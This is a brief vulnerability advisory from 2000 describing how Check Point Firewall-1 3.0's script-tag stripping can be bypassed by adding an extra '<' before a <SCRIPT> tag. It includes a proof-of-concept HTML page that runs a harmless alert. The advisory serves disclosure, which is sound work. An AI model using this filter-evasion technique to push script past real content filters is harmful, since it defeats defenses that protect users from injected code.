Firewall-1 Allows Script Rule Circumvention
Reported January 30, 2000 by Arne Vidstrom
VERSIONS AFFECTED
  • Firewall-1

DESCRIPTION

The "Strip Script Tags" in FW-1 can be circumvented by adding an extra less than sign (<) before the actual <SCRIPT> tag in the body of an HTML document.

For example, the following code works to bypass Firewall-1 rules.

<HTML>
<HEAD>
<<SCRIPT LANGUAGE="JavaScript">
alert("hello world")
</SCRIPT>
</HEAD>
<BODY>
test
</BODY>
</HTML>

The code seen above will pass through the firewall unchanged and execute on the desktop under both Netscape Navigator and Internet Explorer. This was tested on version 3.0 of Firewall-1 running on Windows NT 4.0.

VENDOR RESPONSE

Checkpoint is aware of the issue however no response was known at the time of this writing.

CREDITS
Discovered by
Arne Vidstrom